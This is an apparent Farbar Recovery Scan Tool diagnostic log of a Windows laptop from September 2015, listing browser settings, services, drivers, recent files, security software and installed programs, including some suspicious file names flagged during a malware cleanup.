HKU\S-1-5-21-934653896-176862922-3437185597-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14
HKU\S-1-5-21-934653896-176862922-3437185597-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14
SearchScopes: HKU\S-1-5-21-934653896-176862922-3437185597-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}
SearchScopes: HKU\S-1-5-21-934653896-176862922-3437185597-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-06] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-09-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-09-03] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://www.facebook.com/"
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-16]
CHR Extension: (Google Docs) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-16]
CHR Extension: (Google Drive) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-16]
CHR Extension: (YouTube) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-16]
CHR Extension: (Google Search) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-16]
CHR Extension: (Google Sheets) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-16]
CHR Extension: (Google Docs Offline) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-03]
CHR Extension: (AdBlock) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-07-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-16]
CHR Extension: (Gmail) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdaptiveSleepService; C:\Program Files\ATI Technologies\ATI.ACE\A4\AdaptiveSleepService.exe [140288 2014-04-18] () [File not signed]
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-04-18] (Advanced Micro Devices, Inc.) [File not signed]
R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [87384 2015-02-05] (Alps Electric Co., Ltd.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [312448 2013-08-07] (Windows ® Win 7 DDK provider) [File not signed]
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [1039160 2013-10-09] (Hewlett-Packard Development Company, L.P.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe [142584 2015-02-27] (Panda Security, S.L.)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-29] (Softex Inc.) [File not signed]
R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [66808 2014-10-09] (Panda Security, S.L.)
R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe [38136 2015-02-27] (Panda Security, S.L.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-02-13] (Realtek Semiconductor)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2014-04-02] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-04] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-04] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AmdAS4; C:\Windows\System32\drivers\AmdAS4.sys [17640 2013-10-24] (Advanced Micro Devices, INC.)
R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36608 2013-12-14] (Advanced Micro Devices, Inc.)
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3858944 2013-10-17] (Qualcomm Atheros Communications, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWB6.sys [222720 2014-03-12] (Advanced Micro Devices)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [226304 2014-03-18] (Microsoft Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-06] (CyberLink)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R1 gfilterdrv; C:\Windows\System32\drivers\gfilterdrv.sys [58168 2015-07-08] (Windows ® Win 7 DDK provider)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-09-03] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [113880 2015-09-03] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R1 NNSALPC; C:\Windows\System32\DRIVERS\NNSAlpc.sys [93968 2015-02-10] (Panda Security, S.L.)
R1 NNSHTTP; C:\Windows\System32\DRIVERS\NNSHttp.sys [202000 2015-02-10] (Panda Security, S.L.)
R1 NNSHTTPS; C:\Windows\System32\DRIVERS\NNSHttps.sys [110864 2015-02-10] (Panda Security, S.L.)
R1 NNSIDS; C:\Windows\System32\DRIVERS\NNSIds.sys [116496 2015-02-10] (Panda Security, S.L.)
R1 NNSNAHSL; C:\Windows\system32\DRIVERS\NNSNAHSL.sys [49936 2014-12-31] (Panda Security, S.L.)
R1 NNSPICC; C:\Windows\System32\DRIVERS\NNSPicc.sys [99600 2015-02-10] (Panda Security, S.L.)
R1 NNSPIHSW; C:\Windows\System32\DRIVERS\NNSPihsw.sys [69904 2015-02-10] (Panda Security, S.L.)
R1 NNSPOP3; C:\Windows\System32\DRIVERS\NNSPop3.sys [124176 2015-02-10] (Panda Security, S.L.)
R1 NNSPROT; C:\Windows\System32\DRIVERS\NNSProt.sys [299792 2015-02-10] (Panda Security, S.L.)
R1 NNSPRV; C:\Windows\System32\DRIVERS\NNSPrv.sys [166160 2015-02-10] (Panda Security, S.L.)
R1 NNSSMTP; C:\Windows\System32\DRIVERS\NNSSmtp.sys [113424 2015-02-10] (Panda Security, S.L.)
R1 NNSSTRM; C:\Windows\System32\DRIVERS\NNSStrm.sys [257296 2015-02-10] (Panda Security, S.L.)
R1 NNSTLSC; C:\Windows\System32\DRIVERS\NNSTlsc.sys [106256 2015-02-10] (Panda Security, S.L.)
R2 PSINAflt; C:\Windows\System32\DRIVERS\PSINAflt.sys [163576 2015-06-18] (Panda Security, S.L.) [File not signed]
R2 PSINFile; C:\Windows\System32\DRIVERS\PSINFile.sys [121616 2015-02-26] (Panda Security, S.L.)
R1 PSINKNC; C:\Windows\System32\DRIVERS\psinknc.sys [197392 2015-02-26] (Panda Security, S.L.)
R2 PSINProc; C:\Windows\System32\DRIVERS\PSINProc.sys [124176 2015-02-26] (Panda Security, S.L.)
R2 PSINProt; C:\Windows\System32\DRIVERS\PSINProt.sys [133904 2015-02-26] (Panda Security, S.L.)
R2 PSINReg; C:\Windows\System32\DRIVERS\PSINReg.sys [107792 2015-02-26] (Panda Security, S.L.)
S3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [61712 2015-05-22] (Panda Security, S.L.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [291544 2014-01-04] (Realtek Semiconductor Corp.)
S3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [1936088 2013-08-01] (Realtek Semiconductor Corporation                           )
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-23] (Hewlett-Packard Development Company, L.P.)
U3 McAPExe; no ImagePath
U3 McMPFSvc; no ImagePath
U3 McNaiAnn; no ImagePath
U3 mcpltsvc; no ImagePath
U3 mfecore; no ImagePath
U3 MSK80Service; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-03 18:55 - 2015-09-03 18:55 - 00000000 _____ C:\Recovery.txt
2015-09-03 18:52 - 2015-09-03 18:52 - 00262144 _____ C:\Windows\system32\config\userdiff
2015-09-03 18:41 - 2015-09-03 18:41 - 00000000 ____D C:\$WINDOWS.~BT
2015-09-03 08:22 - 2015-09-03 08:36 - 00037008 _____ C:\Users\user\Downloads\FRST.txt
2015-09-03 08:20 - 2015-09-03 08:24 - 00000000 ____D C:\FRST
2015-09-03 08:00 - 2015-09-03 08:01 - 02188800 _____ (Farbar) C:\Users\user\Downloads\FRST64.exe
2015-09-03 07:46 - 2015-09-03 07:46 - 04116296 _____ (Google) C:\Users\user\Downloads\chrome_cleanup_tool.exe
2015-09-03 04:00 - 2015-09-03 04:00 - 00280760 _____ C:\Windows\Minidump\090315-21953-01.dmp
2015-09-03 02:24 - 2015-09-03 02:24 - 00043664 _____ C:\Windows\system32\Drivers\hitmanpro37.sys
2015-09-03 02:20 - 2015-09-03 02:24 - 00000000 ____D C:\ProgramData\HitmanPro
2015-09-03 02:16 - 2015-09-03 08:48 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-09-03 02:16 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-09-03 02:16 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-09-03 02:16 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-09-03 02:15 - 2015-09-03 02:15 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\user\Downloads\mbam-setup-2.1.8.1057.exe
2015-09-03 02:15 - 2015-09-03 02:15 - 11352032 _____ (SurfRight B.V.) C:\Users\user\Downloads\HitmanPro_x64.exe
2015-09-03 01:58 - 2015-09-03 02:04 - 00000000 ____D C:\AdwCleaner
2015-09-03 01:57 - 2015-09-03 01:57 - 01654272 _____ C:\Users\user\Downloads\adwcleaner_5.005.exe
2015-09-03 01:49 - 2015-09-03 01:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-09-03 01:47 - 2015-09-03 07:53 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-09-03 01:47 - 2015-09-03 07:17 - 00000896 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-09-03 01:47 - 2015-09-03 01:47 - 00003872 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-03 01:47 - 2015-09-03 01:47 - 00003636 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-03 01:07 - 2015-09-03 01:07 - 00453120 __RSH C:\Users\user\AppData\Roaming\scrrunp.dll
2015-09-02 13:19 - 2015-09-02 17:49 - 00000000 __RHD C:\ESD
2015-09-02 05:22 - 2015-09-02 05:22 - 00000000 ____D C:\Users\user\AppData\Roaming\FireFoxUpdServeis
2015-09-01 03:54 - 2015-09-01 03:55 - 00843976 _____ C:\Windows\Minidump\090115-21859-01.dmp
2015-08-31 09:02 - 2015-08-31 09:02 - 00280760 _____ C:\Windows\Minidump\083115-27203-01.dmp
2015-08-30 10:39 - 2015-09-03 01:20 - 00000712 ____H C:\ProgramData\@system.temp
2015-08-30 10:38 - 2015-09-03 07:18 - 00000000 ____D C:\Users\user\AppData\Roaming\GoogleUpdate
2015-08-30 10:38 - 2015-09-03 01:20 - 00000448 ____H C:\ProgramData\@system3.att
2015-08-30 10:38 - 2015-08-30 10:38 - 00000464 ____H C:\Users\user\AppData\Roaming\½ž’“Ó™œ‰
2015-08-29 23:07 - 2015-08-29 23:07 - 00280760 _____ C:\Windows\Minidump\082915-39062-01.dmp
2015-08-29 13:45 - 2015-08-29 13:45 - 00280704 _____ C:\Windows\Minidump\082915-30109-01.dmp
2015-08-18 23:51 - 2015-08-18 23:56 - 00000000 ____D C:\ProgramData\pauhu
2015-08-17 02:34 - 2015-08-17 02:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HoMM3 HD
2015-08-16 21:30 - 2015-08-16 21:30 - 00000364 _____ C:\Windows\mplaynow.log
2015-08-16 21:30 - 2015-08-16 21:30 - 00000000 ____D C:\Windows\wb
2015-08-15 15:24 - 2015-08-15 15:24 - 00280704 _____ C:\Windows\Minidump\081515-20640-01.dmp
2015-08-14 18:15 - 2015-09-02 05:12 - 00000000 ____D C:\Users\user\AppData\Local\YbPack
2015-08-14 17:25 - 2015-09-02 04:48 - 00000000 ____D C:\Users\user\AppData\Local\Ufrmedia
2015-08-12 15:01 - 2015-09-03 04:00 - 519323636 _____ C:\Windows\MEMORY.DMP
2015-08-12 15:01 - 2015-09-03 04:00 - 00000000 ____D C:\Windows\Minidump
2015-08-12 15:01 - 2015-08-12 15:01 - 00280704 _____ C:\Windows\Minidump\081215-18234-01.dmp
2015-08-11 13:46 - 2015-08-11 13:46 - 00000000 ____D C:\Users\user\Documents\Ubisoft
2015-08-11 13:46 - 2015-08-11 13:46 - 00000000 ____D C:\Users\user\AppData\Roaming\Steam
2015-08-11 13:41 - 2015-09-03 04:00 - 00006215 _____ C:\Windows\setupact.log
2015-08-11 13:41 - 2015-09-03 04:00 - 00001836 _____ C:\Windows\PFRO.log
2015-08-11 13:41 - 2015-08-11 13:41 - 00000000 _____ C:\Windows\setuperr.log
2015-08-11 13:33 - 2015-09-02 16:40 - 00016758 _____ C:\Windows\WindowsUpdate.log
2015-08-11 13:33 - 2015-08-16 21:45 - 00466456 _____ (Creative Labs) C:\Windows\system32\wrap_oal.dll
2015-08-11 13:33 - 2015-08-16 21:45 - 00444952 _____ (Creative Labs) C:\Windows\SysWOW64\wrap_oal.dll
2015-08-11 13:33 - 2015-08-16 21:45 - 00122904 _____ (Portions © Creative Labs Inc. and NVIDIA Corp.) C:\Windows\system32\OpenAL32.dll
2015-08-11 13:33 - 2015-08-16 21:45 - 00109080 _____ (Portions © Creative Labs Inc. and NVIDIA Corp.) C:\Windows\SysWOW64\OpenAL32.dll
2015-08-11 13:33 - 2015-08-11 13:33 - 00000000 ____D C:\Program Files (x86)\OpenAL
2015-08-10 16:20 - 2015-08-10 16:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anvisoft
2015-08-10 16:20 - 2015-08-10 16:27 - 00000000 ____D C:\Program Files (x86)\Anvisoft
2015-08-10 14:27 - 2015-08-10 14:27 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2015-08-07 20:33 - 2015-08-07 20:33 - 00000000 ____D C:\Users\user\AppData\Local\GWX
2015-08-07 17:04 - 2015-08-31 13:51 - 00000000 ____D C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-08-07 16:51 - 2015-07-08 01:06 - 00058168 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\gfilterdrv.sys
2015-08-07 16:47 - 2015-08-07 16:47 - 00000000 ____D C:\Users\user\AppData\Local\Steam
2015-08-07 16:47 - 2015-08-07 16:47 - 00000000 ____D C:\Users\user\AppData\Local\CEF
2015-08-07 12:47 - 2015-08-07 12:47 - 00000000 ____D C:\Users\user\AppData\Roaming\LaunchPad
2015-08-05 16:46 - 2015-08-05 16:46 - 00000000 ____D C:\Users\user\Downloads\Robert Jordan & Brandon Sanderson - Wheel of Time 14 - A Memory of Light (v4.0)
2015-08-05 16:24 - 2015-08-05 16:24 - 00000000 ____D C:\Users\user\AppData\Local\calibre-cache
2015-08-05 16:23 - 2015-08-05 16:54 - 00000000 ____D C:\Users\user\Documents\Calibre Library
2015-08-05 16:22 - 2015-08-05 16:24 - 00000000 ____D C:\Users\user\AppData\Roaming\calibre
2015-08-05 16:22 - 2015-08-05 16:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\calibre 64bit - E-book Management
2015-08-05 16:22 - 2015-08-05 16:22 - 00000000 ____D C:\Program Files\Calibre2
2015-08-05 15:13 - 2015-08-05 15:13 - 00000000 ____D C:\Users\user\AppData\Roaming\WinRAR
2015-08-05 13:56 - 2015-08-05 13:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-03 08:48 - 2015-07-17 00:03 - 00000000 ____D C:\Users\user\AppData\Roaming\uTorrent
2015-09-03 08:00 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\system32\sru
2015-09-03 07:24 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\LiveKernelReports
2015-09-03 07:22 - 2015-03-19 07:23 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-934653896-176862922-3437185597-1002
2015-09-03 07:19 - 2015-03-19 07:20 - 00000000 ____D C:\Users\user\Documents\Youcam
2015-09-03 07:18 - 2015-07-18 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-03 07:17 - 2015-07-16 18:48 - 00000000 ___DO C:\Users\user\OneDrive
2015-09-03 04:00 - 2013-08-23 00:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-09-03 02:11 - 2014-03-18 19:53 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI
2015-09-03 02:05 - 2015-03-19 06:41 - 00065536 _____ C:\Windows\system32\spu_storage.bin
2015-09-03 01:49 - 2015-07-16 18:36 - 00000000 ____D C:\Program Files (x86)\Google
2015-09-03 01:47 - 2015-07-16 18:33 - 00000000 ____D C:\Users\user\AppData\Local\Deployment
2015-09-03 00:34 - 2015-03-19 07:18 - 00003898 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{962FEC79-917D-4E82-BD62-17EA45F302FE}
2015-09-02 13:37 - 2015-07-18 18:59 - 00000000 ____D C:\Users\user\AppData\Roaming\vlc
2015-09-02 13:14 - 2015-07-16 18:35 - 00000000 ____D C:\Users\user\AppData\Local\Google
2015-09-01 00:31 - 2013-08-22 23:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2015-08-31 13:57 - 2014-05-13 18:10 - 00000000 ____D C:\Program Files (x86)\WildGames
2015-08-31 13:53 - 2014-05-13 18:10 - 00000000 ____D C:\ProgramData\WildTangent
2015-08-31 13:53 - 2014-05-13 18:10 - 00000000 ____D C:\Program Files (x86)\WildTangent Games
2015-08-20 18:52 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\rescache
2015-08-16 21:10 - 2013-08-23 01:20 - 00000000 ____D C:\Windows\CbsTemp
2015-08-16 21:09 - 2015-07-19 17:20 - 00220672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplayx.dll
2015-08-16 21:09 - 2015-07-19 17:19 - 00046592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpwsockx.dll
2015-08-16 21:09 - 2015-07-19 17:10 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpmodemx.dll
2015-08-16 21:09 - 2015-07-19 17:09 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
2015-08-16 21:09 - 2013-08-22 21:22 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2015-08-16 21:09 - 2013-08-22 21:22 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2015-08-16 21:09 - 2013-08-22 21:17 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2015-08-16 21:09 - 2013-08-22 21:17 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\dpnhupnp.dll
2015-08-16 21:09 - 2013-08-22 21:17 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\dpnhpast.dll
2015-08-16 21:09 - 2013-08-22 13:56 - 00377856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2015-08-16 21:09 - 2013-08-22 13:56 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
2015-08-16 21:09 - 2013-08-22 13:51 - 00059904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnathlp.dll
2015-08-16 21:09 - 2013-08-22 13:51 - 00009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhupnp.dll
2015-08-16 21:09 - 2013-08-22 13:51 - 00009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhpast.dll
2015-08-14 18:15 - 2015-07-10 16:02 - 00000000 __SHD C:\Users\user\AppData\Local\EmieUserList
2015-08-14 18:15 - 2015-07-10 16:02 - 00000000 __SHD C:\Users\user\AppData\Local\EmieSiteList
2015-08-11 13:39 - 2015-03-19 06:39 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-10 16:25 - 2014-04-02 20:25 - 00000000 ____D C:\Windows\Panther
2015-08-05 13:47 - 2013-08-23 00:44 - 00383584 _____ C:\Windows\system32\FNTCACHE.DAT
 
==================== Files in the root of some directories =======
 
2015-09-03 01:07 - 2015-09-03 01:07 - 0453120 __RSH () C:\Users\user\AppData\Roaming\scrrunp.dll
2015-08-30 10:38 - 2015-08-30 10:38 - 0000464 ____H () C:\Users\user\AppData\Roaming\½ž’“Ó™œ‰
2015-08-30 10:39 - 2015-09-03 01:20 - 0000712 ____H () C:\ProgramData\@system.temp
2015-08-30 10:38 - 2015-09-03 01:20 - 0000448 ____H () C:\ProgramData\@system3.att
2015-07-19 15:22 - 2015-06-16 07:16 - 0076288 ___SH () C:\ProgramData\msbogj.exe
 
Files to move or delete:
====================
C:\ProgramData\msbogj.exe
 
 
Some files in TEMP:
====================
C:\Users\user\AppData\Local\Temp\Heroes_of_Might_and_Magic_3_Complete_PC_Free.exe
C:\Users\user\AppData\Local\Temp\KB166593328.exe
C:\Users\user\AppData\Local\Temp\KB289558421.exe
C:\Users\user\AppData\Local\Temp\KB41462734.exe
C:\Users\user\AppData\Local\Temp\KB543130078.exe
C:\Users\user\AppData\Local\Temp\linstocks.dll
C:\Users\user\AppData\Local\Temp\Plugin.exe
C:\Users\user\AppData\Local\Temp\sqlite3.dll
C:\Users\user\AppData\Local\Temp\update.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
Addition:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-08-2015
Ran by user (2015-09-03 08:50:22)
Running from C:\Users\user\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-934653896-176862922-3437185597-500 - Administrator - Disabled)
Guest (S-1-5-21-934653896-176862922-3437185597-501 - Limited - Disabled)
user (S-1-5-21-934653896-176862922-3437185597-1002 - Administrator - Enabled) => C:\Users\user
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Panda Free Antivirus (Enabled - Up to date) {AAF74A68-8713-CDF1-004F-30003398BE9E}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Panda Free Antivirus (Enabled - Up to date) {1196AB8C-A129-C27F-3AFF-0B72481FF423}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Panda Firewall (Disabled) {92CCCB4D-CD7C-CCA9-2B10-9935CD4BF9E5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\uTorrent) (Version: 3.4.4.40911 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1202.1711.102 - Alps Electric)
AMD Catalyst Install Manager (HKLM\...\{7536C341-2F7D-EFE6-F521-DEBE68B025C5}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
calibre 64bit (HKLM\...\{D4DF4C08-5DCA-4664-8612-1A8511D6F8B4}) (Version: 2.33.0 - Kovid Goyal)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.5.6902 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.5.3416 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3709 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.85 - Google Inc.)
Google Update Helper (x32 Version: 1.3.28.13 - Google Inc.) Hidden
